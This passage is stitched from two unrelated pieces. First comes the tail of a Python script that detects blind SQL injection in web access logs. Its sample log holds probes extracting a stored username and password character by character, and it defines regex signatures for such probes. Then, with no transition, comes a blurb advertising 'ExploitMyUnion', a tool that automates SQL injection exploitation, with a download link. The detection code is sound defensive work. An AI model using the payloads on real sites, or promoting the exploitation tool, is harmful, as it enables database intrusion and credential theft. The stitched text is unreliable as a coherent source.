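203.0.113.5 - - [17/Aug/2013:10:00:04 +0000] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>100 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Aug/2013:10:00:05 +0000] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>80 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [17/Aug/2013:10:00:06 +0000] "GET /news.php?id=12%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20where%20userid=2),1,1))>90 HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Aug/2013:10:00:07 +0000] "GET /news.php?id=13 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""
# Signatures for the probes the post walks through, keyed by what each one indicates.
SIGNATURES = {
    "true_false_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "char_extraction": re.compile(r"\b(?:ascii|substring)\s*\(", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "fingerprint": re.compile(r"@@version|\bmysql\.user\b|\binformation_schema\b", re.I),
}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

def parse_line(line):
    """Return (client ip, path, [(param, decoded value), ...]) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    return m.group("ip"), url.path, parse_qsl(url.query, keep_blank_values=True)

def flag_value(value):
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def analyze(log_text):
    """Per client: flagged-request count and, per injection 'shape', how many requests
    differ only in numeric literals (a bisection leaves a run of such near-duplicates)."""
    report = defaultdict(lambda: {"flagged": 0, "shapes": Counter()})
    for ip, path, params in filter(None, map(parse_line, log_text.splitlines())):
        for name, value in params:
            if flag_value(value):
                report[ip]["flagged"] += 1
                # Collapse digits so ">100", ">80" and ">90" share one key.
                shape = f"{path}?{name}=" + re.sub(r"\d+", "N", value.lower())
                report[ip]["shapes"][shape] += 1
    return dict(report)

def suspicious_clients(report, min_variants=3):
    """Clients with at least min_variants numeric variants of one injection shape."""
    return sorted(ip for ip, r in report.items() if max(r["shapes"].values()) >= min_variants)
```

Run against the sample, only 203.0.113.5 is reported, with five flagged requests and three numeric variants of the same ascii(substring(...)) shape; a real deployment would feed it the live access log and alert on the variant count rather than on any single request.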


Download:
**********



ExploitMyUnion Automate Sql Injection



ExploitMyUnion is a tool written in Python with a PyQt user interface, made to automate SQL injection exploitation.


Features:
Injection via GET/POST/COOKIE.
Quoted injections support.
HTTP proxy support.
SQL 'load_file()' function support.
SQL 'INTO OUTFILE' statement support.
Ability to save/restore injection parameters.
Can dump a table in sql format.


DOWNLOAD:
***************

http://www.4shared.com/file/WNwuV4Zc/exploitmyunion-21_win32.html